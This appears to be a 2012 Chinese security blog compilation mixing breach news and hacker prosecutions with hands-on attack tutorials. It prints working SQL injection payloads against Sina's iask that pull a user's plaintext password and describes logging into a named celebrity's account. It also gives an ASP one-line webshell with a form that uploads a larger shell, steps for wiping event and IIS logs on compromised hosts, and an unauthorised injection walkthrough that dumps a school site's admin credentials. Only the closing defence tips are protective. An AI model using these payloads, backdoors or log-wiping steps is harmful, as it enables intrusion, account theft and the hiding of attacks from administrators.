2012年1月

T00ls.Net长期被DDOS、CC,服务器不堪重负,现暂时关闭网站,希望未来或能解决此问题:



① 若有发展或指导性建议,请邮件或者微博联系管理员,但或不予以直接答复,请谅解。

② 重新开放时间请关注微博或者本站点,感谢大家长期以来对T00ls支持。

③ 感谢DDOSer们对T00ls的热爱,T00ls会因你们而进步。



1.jpg

记者1月10日从国家互联网信息办获悉,近期一些媒体报道或在网上流传的数家网站用户信息被泄露的事件,引起互联网管理部门的高度重视。目前,相关事实已由公安机关查明,违法人员已经或将要被依法严肃查处。

  据这位发言人介绍,近期查处的信息泄露事件主要有五个。

  一是CSDN、天涯网站被入侵事件。经查,这两家网站曾在2009年以前被入侵,数据遭泄露也发生在两年前,近期这两家网站并未遭受攻击。网名“臭小
子”的许某某(男,19岁,无业人员)出于个人炫耀的目的,于去年12月4日在乌云网上发帖称CSDN等网站数据密码被泄露,并公布泄露的数据包截图。现
许某某已被公安机关予以训诫。公安机关对这两家网站遭入侵事正在溯源追查。

  二是网上流传的京东商城网站被入侵事。经查,这个网站确遭入侵但数据未被泄露。网名“我心飞翔”的犯罪嫌疑人要某(男,35岁,陕西省咸阳市某制药厂
员工)于2011年4月发现京东商城网站存在安全漏洞,当年12月29日在乌云网上发帖称掌握京东商城漏洞,以公布该安全漏洞要挟京东商城向其支付270
万元。京东商城网站未予支付,要某也并未窃取、泄露该网站相关数据。要某因涉嫌敲诈勒索,现已被依法刑事拘留。

  三是“YY”语音聊天网站泄露数据事。经查,广东“YY”语音聊天网站泄露的数据,系该公司员工利用职务之便从公司内部备份数据库窃取的。该网站并未被入侵。此事正在处理之中。

  四是网上流传的工商银行等金融机构数据泄露事。经有关部门对工商银行、民生银行、交通银行调查,证实其系统并未被入侵,网上公布的所谓“数据”与银行
相关数据不符。网名“挨踢客”的王某某(男,24岁)从事网络推广工作,为了提高自己所在网站的知名度和自我炒作,于2011年12月28日在其个人的挨
踢客网站和微博上凭空捏造,发布所谓工商银行等网站用户数据泄露的信息,王某某已被公安机关予以训诫。五是网上流传的新浪微博、当当网等网站被攻击事。经
查,新浪微博、开心网、7K7K网站、当当网、凡客诚品等网站均未被入侵。网上公布的上述网站部分账号密码系有人利用网络远程大规模猜测密码所破解,实施
密码破解的人员身份目前已被锁定,公安机关正在实施抓捕。

  截至目前,公安机关此次已查处入侵、窃取、倒卖数据案件9起,编造并炒作信息泄露案件3起,刑事拘留4人,予以治安处罚8人。

  国家互联网信息办发言人表示,从上述案例可以看到一些人编造或炒作网站用户信息被大规模泄露的消息,既有出于个人进行炫耀或骗取钱财的目的,也有一些
网络安全公司销售人员想以此提高知名度、推销自己的产品,还有个别人借机企图干扰和贬损北京等城市正在开展的微博客用户用真实身份信息注册工作。

  他指出,国家互联网信息办公室、工信部和公安部等有关部门对非法入侵网站泄露数据信息的犯罪行为予以强烈谴责,并将依法严惩;对编造散布谣言的行为予
以谴责和查处。有关部门将继续采取有效措施,保护公民个人身份信息安全。公安机关将严厉打击非法入侵网站泄露数据信息的行为以及捏造事实、编造和传播谣言
的行为,并依法查处相关人员。各网站必须进一步建立健全用户信息安全管理制度,强化工作人员信息安全意识,严禁泄露用户信息,提高反病毒、反黑客能力,确
保用户信息安全。

CSDN“泄密门”两名黑客已经落网

昨天,几乎让互联网裸奔的“CSDN泄密门”事件传出最新消息,两名涉案黑客已经被抓,还有部分人员尚未落网。

日前,CSDN网站数据库遭黑客入侵,600万用户注册邮箱和密码被泄露。此后人人网、天涯社区、百合网等众多知名网站数千万网友个人信息相继被泄露,更有人将其做成压缩包,上传至网络供人下载。国内网站纷纷“沦陷”,大有“裸奔”之势。

记者昨日联系到北京市公安局外宣处,工作人员表示,目前已有两名涉案黑客被抓,由于部分涉案人员没有归案,具体案情尚不便向外界透露。北京市公安局外宣处相关负责人员告诉记者,此次泄密与实名制无关。

摘自:雅虎新闻   

    正义网浙江1月4日电(通讯员 王红)只因“个人兴趣”,19岁的李胖胖利用木马程序非法侵入公安局网站服务器,获取他人计算机控制权。2011年12月28日,浙江省台州市椒江区检察院以非法控制计算机信息系统罪对李胖胖提起公诉。据悉,这是浙江省检察机关首次起诉这一罪名的案件。

    据了解,1992年4月出生的李胖胖是贵州省遵义人,初中文化。2009年,李胖胖开始接触互联网,通过在QQ群和网上论坛的学习,掌握了网络攻击、网络漏洞扫描等黑客软件的使用方法。2011年2月开始,李胖胖在互联网上用软件随机扫描服务器漏洞,并通过软件自动建立新的用户名和密码,从而获取服务器的控制权。

    李胖胖交代,自己控制别人的计算机,完全是出于个人兴趣,并不是为了赚钱。得到服务器控制权后,他就到QQ群里叫卖,每个只卖5元到25元不等。

    2011年2月5日,李胖胖侵入并控制了“台州市网上公安局”网站服务器。3月15日,台州市公安局公共信息网络安全监察队工作人员在维护服务器时,发现有黑客侵入的痕迹和非法木马文件,可能对业务造成重大影响。工作人员通过技术侦查,锁定了犯罪嫌疑人李胖胖,随即报案。9月22日,李胖胖在遵义家中被警方抓获。经查,他共非法控制了包括台州市公安局网站服务器在内的34台服务器。

    据办案检察官介绍,非法控制计算机信息系统罪是根据刑法修正案(七)修改的新罪名。根据全国人大法工委刑法室对于该罪的释义,所谓的侵入是指未经授权或者他人同意,通过技术手段进入计算机信息系统。非法控制是指通过各种技术手段,使得他人的计算机信息系统处于掌控之中,能够接受其发出的命令。李胖胖利用木马程序非法侵入他人计算机服务器,符合这一罪名的构成要件。另外,“两高”出台的关于办理危害计算机信息系统安全刑事案件的相关司法解释规定,非法获取计算机信息系统数据或者非法控制计算机信息系统,非法控制计算机信息系统20台以上的,属于情节严重。李胖胖非法控制他人计算机服务器34台,已属于情节严重。



各位  兴趣归兴趣    玩玩就够了  我们都懂的~~

看到 公安的服务器还是乖点---------

相关厂商:www.sina.com

作者:http://weibo.com/evilniang

发现时间:2012-1-1

漏洞类型:sql注射

危害等级:高

漏洞状态:已修复



首先申明:该漏洞发现后本人已联系新浪官方修复漏洞,目前漏洞以修补。文章内容公布,仅供参考学习。



新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。



漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9



漏洞利用方式:



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。



直接举个例子比如我们通过新浪微波查找到刘谦,点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id),此处uid为12715428867







直接构造地址



http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--



直接获得刘谦的账号和密码







这里账号是luchenmagic密码为2lo*****(保密)



尝试登陆







成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信,聊天记录之类的。



接下来的事情你可以自由发挥了。但是对于一个黑客而言,这只不过是一个开始而已(这里我并无恶意,拿刘谦的账号来测试只是为了致敬,希望有机会能够见证奇迹!)。



后话:



1.2011年年底的csdn、天涯等用户库的泄露只不过是冰山一脚。



2.新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露,而且密码是密文保存。这里要提出质疑了,数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码(部分用户查不到密码)。至于用户信息是否泄露,这个不用说了把?



3.网络泄密涉及到太多。不管是普通网民,还是明星名人,都被牵涉进来。这里测试不少明星,基本上都能通过微薄获取他们的私人信息,甚至登陆他们的msn。(香港爆料杂志来找我把。开个玩笑。。。)



4.这个漏洞发现后我便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后连给我回个邮件或者表示感谢都没有。(我是无私奉献白帽子,被活雷锋了。)



5.祝新年快乐。

----------------------------------------------------

游侠补充:

  刚从流量统计系统看到阅读者暴增,原来是文中例子的主角刘谦先生在微博发了一条……好吧:这个事情,仅仅是刘谦先生的粉丝在做个安全测试,并无恶意。我们都喜欢刘先生的魔术。

  谢谢刘谦先生给我博客打广告……来西安我请你吃肉夹馍、羊肉泡馍——管饱! :)

  另:文章是新浪打了补丁之后作者才发出来的,看到本文的时候还想测试的话……晚了。嘿嘿

看到很多人还是不理解一句话木马的原理,这里就转一篇东西科普下吧
——————————————————我是科普线——————————————————————
一句话木马的适用环境:

1.服务器的来宾账户有写入权限

2.已知数据库地址且数据库格式为asa或asp

3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可



一句话木马的工作原理:

"一句话木马"服务端(本地的html提交文件)

就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完 成相应的操作,服务端的代码内容为   <%execute request("value")%>   其中value可以自己修改



"一句话木马"客户端(远程服务器上被插入一句话的asp文件)

用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件



现在先假设在远程主机的TEXT.ASP(客户端)中已经有了<%execute request("value")%>这个语句.)在ASP里<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们 就可以在本地构造一个表单内容如下:(//为注释)



<form action=http://www.badguest.cn /TEXT.asp method=post>



<textarea name=value cols=120 rows=10 width=45>



set lP=server.createObject("Adodb.Stream")//建立流对象

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet="gb2312" //字体标准

lP.writetext request("newvalue")



lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect "newmm.asp" //转向newmm.asp



</textarea>



<textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>

<input type=submit value=提交>



</form>



表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的VALUE一样,就是我用蓝色标记的那两处,必须相等)



说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.



具体的就是下面这一段:



set lP=server.createObject("Adodb.Stream")//建立流对象

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet="gb2312" //字体标准

lP.writetext request("newvalue")



lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect "newmm.asp" //转向newmm.asp



这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.

至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。即newmm.asp为我们的shell地址。





关于服务器错误:



经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:

Script error detected at line 1.

Source line: execute request("nettoo")

Description: 类型不匹配: 'execute'

这个如何解决呢?

想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了!

用一句话客户端连接,加入容错语句,你可以把它插入到任何ASP文件而不会像以前一样出错。

<%On Error Resume Next execute request("value")%>

“我自己做信息安全的,没有开网银,从没在网上进行出入境申请,从来不在网上支付东西,网络购物也从不自己下单,都是通过朋友的支付系统操作,让自己逃离那个环境。”市政协委员、广东南方信息安全产业基地有限公司董事长宋国琴的保守行为让记者大吃一惊。“在这个业界,了解得多,忧虑就会多些,于是行为就趋于保守,”宋国琴笑言,“这不是好事情,不值得推荐”。

  连日来,国内多个知名商业网站、政务网站相继陷入“泄密门”,数千万的用户信息被泄露,在数以亿计的网民们中引发震动和不安。网络信息安全到底问题出在哪?网民们该如何保护自己的信息安全?昨日,市政协会议开幕之际,宋国琴接受本报记者专访,向广大网民支招。

  宋国琴表示,网络技术是近几十年的爆炸性革命,发展到今天,引发的网络信息安全问题是必然的。前段时间,国外的银行也曾发生过数千万客户信息泄露的问题。所以,这是一个国际的共性问题。

  互联网在中国起步较晚,国内在管理、规范等方面跟其他国家有差距,有一个日渐完善的过程。中国的互联网用户基数特别大,信息安全管理的难度就更大。“这是一个客观存在的巨大的问题。”

  “信息技术发展到比较高端的一定是密码技术的运用。”宋国琴解释说,这个密码技术不是大家在网站注册时设置的密码,“那个6~8位数的英文或数字的设置只是个初级编码,无论怎么不规律,对于专业技术人员来说,几十秒钟就可以破译。”

  宋国琴介绍,通过密码技术对个人的商务资料、个人信息、隐私文件等进行加密处理。她打了个比方:“这个密码技术就如银行的保险箱,对客户放在其中的东西进行加密,如果被盗,别人只能得到这个保险箱,却无法取得里面的东西。”目前,密码技术的运用不够广泛,如果以密码技术为核心的信息安全技术能够大量运用的话,陈冠希、张柏芝的“艳照门”事件也就不会发生了。

  建议警方指引网民

  “网络上暴民和良民混淆在一起,让我害怕。”虚拟社会的管理机制缺失,宋国琴坦陈自己“对网络有戒心,不太习惯过于依赖网络”。宋国琴指出,“下一步,国家有可能对互联网进行身份认证。不一定是实名制,但是是身份认证,这是一个趋势。”

  宋国琴认为,要解决互联网安全问题,最核心的是要攻克海量身份识别技术。而从管理层面来说,要承认目前的管理环境和管理技术还不够完善。公安系统应给网民提供一些技术支持、引导,局部解决一些问题。比如:推荐市民采用一些带有密码技术的软件,对自己电脑里的重要资料和文件进行保护;如何识别钓鱼网站,有木马程序的网站等。她打算进行一个详细的调研,并形成提案交给公安部门和执法部门。

  专家提醒网民:

  开网页先看审核认证码

  普通市民的信息安全技术和知识十分有限,他们在日常上网操作时该如何保护自己的信息安全?宋国琴建议,市民可以购买具有PC文件柜、文件锁功能的软件产品,对个人的商务资料、个人信息、隐私文件等进行加密,即使被盗了,别人看到的也只是一堆乱码。宋国琴指出,作为网络运营商、技术服务提供商,更应该通过密码技术的运用,提高所提供平台的安全性,给客户构筑一个安全的网络使用、交易环境。

  不断有网友反映,收到QQ抽奖的页面链接。宋国琴表示,这都是假的,轻易进行下一步操作,会导致钱财损失。她建议网友打开网站首页时,首先页面最下方,如果有一连串审核认证号码、备案号码,表明这个网站的域名是在公安等相关部门注册了的,是正规网站。

  链接:近期网络安全事件

  去年12月22日,CSDN网站承认安全系统遭到黑客攻击,数据库中超过600万用户的登录名和密码泄露。当月26日,天涯网证实用户密码遭到泄露。当月29日上午,有网友称广东省公安厅出入境政务服务网网站后台存在漏洞。广东省公安厅随后承认,该网站确实存在技术漏洞,现已修补完毕。

安全日志
  系统日志
  DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT
  系统日志文件:%systemroot%system32configSysEvent.EVT
  应用程序日志文件:%systemroot%system32configAppEvent.EVT
  FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个
  WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志
  以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,
  它们这些LOG文件在注册表中的:
  HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
  钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录注销失败
  怎样删除这些日志:通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志安全日志应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.
  下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的"暂停" 或"停止" 操作。
  怎么清除系统日志.
  怎么利用工具清除IIS日志
  怎么清除历史和cookie
  怎么察看防火墙 Blackice的日志
  netstat -an 表示的什么意思
  -----------------------------------------
  1. 系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe
  使用方法:
          Usage: clearlogs [\computername] <-app / -sec / -sys>
  -app = 应用程序日志
  -sec = 安全日志
  -sys = 系统日志
  a. 可以清除远程计算机的日志
  ** 先用ipc连接上去: net use \ipipc$ 密码/user:用户名
  ** 然后开始清除: 方法
  clearlogs \ip -app 这个是清除远程计算机的应用程序日志
  clearlogs \ip -sec 这个是清除远程计算机的安全日志
  clearlogs \ip -sys 这个是清除远程计算机的系统日志
  b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面
  然后清除. 方法:
  clearlogs -app 这个是清除远程计算机的应用程序日志
  clearlogs -sec 这个是清除远程计算机的安全日志
  clearlogs -sys 这个是清除远程计算机的系统日志
  安全日志已经被清除.Success: The log has been cleared 成功.
  为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.
  例如建立一个 c.bat
  rem ============================== 开始
  @echo off
  clearlogs -app
  clearlogs -sec
  clearlogs -sys
  del clearlogs.exe
  del c.bat
  exit
  rem ============================== 结束
  在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果
  第一行表示: 运行时不显示窗口
  第二行表示: 清除应用程序日志
  第三行表示: 清除安全日志
  第四行表示: 清除系统日志
  第五行表示: 删除 clearlogs.exe 这个工具
  第六行表示: 删除 c.bat 这个批处理文件
  第七行表示: 退出
  用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法
  AT 时间 c:c.bat
  之后你就可以安全离开了. 这样才更安全一点.
  -----------------------------------------
  2. 清除iis日志:
  工具:cleaniis.exe
  使用方法:
  使用方法:
          iisantidote <logfile dir> <ip or string to hide>
          iisantidote <logfile dir><ip or string to hide> stop
          stop opiton will stop iis before clearing the files and restart it after
  <logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the  
          使用方法解释:
  cleaniis.exe iis日志存放的路径 清除参数
  什么意思呢??我来给大家举个例子吧:
  cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
  这个表示清除log中所有此 IP(192.168.0.1)地址的访问记录. -----推荐使用这种方法
  cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
  这个表示清除这个目录里面的所以的日志
  c:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 这个路径可以改变
  c:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 这个路径可以改变
  这个测试表示 在日志里面没有这个ip地址.
  我们看一下日志的路径 再来看一下
  我们的 ip(192.168.0.1)已经没有了.
  已经全部清空. 同样这个也可以建立批处理. 方法同上面的那个.
  3. 清除历史记录及运行的日志:
  cleaner.exe
  直接运行就可以了.
  -----------------------------------------
  4. 察看blackice的日志.
  这个地方我们可以清除的看到 防火墙的日志.
  这个表示 有人发过来带有病毒的email附件. ip是: 220.184.153.116
  tcp_probe_other 表示 通过tcp 扫描 或者利用别的和你建立连接 通信
  这个表示通过端口 80 扫描iis
  病毒 nimda
  这里需要很多的计算机协议知识. 同时也需要对英语有了解
  才能更好的分析 如果对英语不好 你可以装一个金山词霸.
  一般情况下 我们可以 对一些可以不用管.
  一般这三种情况 不用去管.
  最上面的 critical 这个 可以去关注一下 . 一般是确实有别的计算机扫描或者入侵你的计算机
  count 代表次数 intruder 是对方的ip event 是通过什么方式(协议) 扫描或者想入侵的
  time表示时间
  5.-----------------------------------------
  netstat -an 表示什么意思?

  使用这个命令可以察看到和本机的所有的连接.
  Proto Local Address Foreign Address State
  协议 本地端口及IP地址 远程端口及IP地址 状态
  LISTENING 监听状态 表示等待对方连接
  ESTABLISHED 正在连接着.
  TCP 协议是TCP
  UDP 协议是UDP
  TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
  这个表示 利用tcp协议 本机ip(192.168.0.10)通过端口:1115 和远程ip(61.186.97.54)端口:80连接
  80端口 表示 http 就是你在访问这个网站.一般情况下远程ip的端口: 80 21 8000 这个都是正常的. 如果是别的就可以看一下你的计算机了。

    晚上在群里聊选课的事情,聊着聊着,竟然扯到学校网站的注入漏洞了,向师哥确认了一下存在注入漏洞的子站,便决定去看一下,练练手~  话说这个子站我很久以前进行了一次检测,当时没有发现搜索注入的,但是师哥说这个注入漏洞已经存在两年了,难道是当时我检测的时候漏掉了什么?

    打开网站,直奔主题,拖到最下面的搜索框,填入' ,果断报错。。。(话说截图好麻烦,我就不截图了。。。)  咦,难道真的是我当时没发现?

    继续测试,填上了aa,搜出了一大堆东西来,然后继续测试,

    在搜索框填入aa%' and 1=1 and '%'='%,搜索,报错。。。  怎么个情况。。。  这是在告诉我这次检测失败吗?

    这是师哥在群里发来了一个连接,说里面有他的文章,就是说这个网站的,果断点进去开始下载,然后就是。。。漫长的等待。。。。。(也不知是那个服务器,下载速度慢的让人蛋疼。。。)

    下载完成后,找到师哥的文章,跟截图比对了一下,就是这个注入点,没有错,那难道是语句的问题?仔细比对了一下,一下子我就醒悟了,原来是后面多了一个%。。。。 - -!  我竟然忘记了在查询数据库时后面还有一个通配符。。。

    例:sql= select * from news where title like '%关键字%';

    注入构造的语句是 select * from news where title like '%关键字%' and 1=1 and '%'='%';

    知道原因后,马上开始

    aa%' and 1=1 and '%'='  返回正常

    aa%' and 1=2 and '%'='  返回错误   存在搜索型注入漏洞。。。

    看了一下师哥的文章,他到这里以后就直接丢工具了,我这里准备手工搞一下,熟悉一下代码,呵呵,开始

    aa%' and exists(select * from admin)--  返回正常  

    aa%' and exists(select username from admin)-- 正常  进展的还真是异常的顺利啊

    aa%' order by xx--  16正常,17错误

    接下来开始爆字段内容

    aa%' and 1=2 union select 1,2,3,4.....16 from admin--  发现5,6两个字段可用

    替换为 aa%' and 1=2 union select 1,2,3,4,username,password,7,8.....16 from admin--  成功爆出管理员帐号密码

    登录后台逛了一下,有一个上传点,貌似师哥在文章里提过可以用cookies绕过,这里就不搞了,这次主要是练练手,熟悉一下手工注入。

    通过这次练习,还是对搜索注入有了进一步的了解的,还有就是注入语句的构造要自己动一下脑子才能得到应有的效果,还有一点就是在猜解表名和字段的时候,可以用col_name等系统函数来列出来,会省下很多时间。。。  嗯嗯  大概就是这个样子。小菜有错误的地方欢迎指正~  o(∩_∩)o 呵呵~

大家存在5点误区:

1、sql注入比较难防,需要替换select,delete等一打字符

其实对于字符型替换再多都没有替换单引号为两个单引号来的好!对于数字型替换再多都没有用,一定要类型转换。

2、忽略DropDownList传来的东西

其实是不对的,一切客户端的东西都是不可信任的,select下拉框也是!因为可以自己做一个htm提交到服务器。

3、access比sqlserver不安全

安全不安全关键看怎么用,如果sqlserver还是像access一样用,一个sa帐户的话,很明显,sqlserver比access不安全,可以直接得到表名和字段名!access反而倒安全点了,因为只能通过逐位猜解得到。



4、网站没有显示出错信息就说明网站是安全的

当有记录的时候显示记录,没有记录的时候显示





找不到任何记录,通过这两种状态就可以猜解字



段名了,所以网页不出错不能说明是安全的





5、忽略post提交的信息

很多人对url上传递的东西过滤严格,对于post的东西不理不睬是不对的,post的东西更加容易被注入,因为一般字段比较多



在asp.net中强烈建议通过参数来实现sql而不是sql拼接,因为就算你每一个都过滤百密难有疏

比如:

SqlConnection conn=new SqlConnection(System.Configuration.ConfigurationSettings.AppSettings["conn"]);

            SqlCommand comm=new SqlCommand("update tb1 set vName=@vName,iAge=@iAge where ID=@id",conn);

            SqlParameter parm1=new SqlParameter("@vName",SqlDbType.NVarChar,50);

            parm1.Value=((TextBox)e.Item.FindControl("name")).Text;

            SqlParameter parm2=new SqlParameter("@iAge",SqlDbType.Int);

            parm2.Value=((TextBox)e.Item.FindControl("age")).Text;

            SqlParameter parm3=new SqlParameter("@id",SqlDbType.Int);

            parm3.Value=this.DataGrid1.DataKeys[e.Item.ItemIndex];

            comm.Parameters.Add(parm1);

            comm.Parameters.Add(parm2);

            comm.Parameters.Add(parm3);

            conn.Open();

            comm.ExecuteNonQuery();

            conn.Close();



这样的代码看起来舒服而且又安全,何乐不为?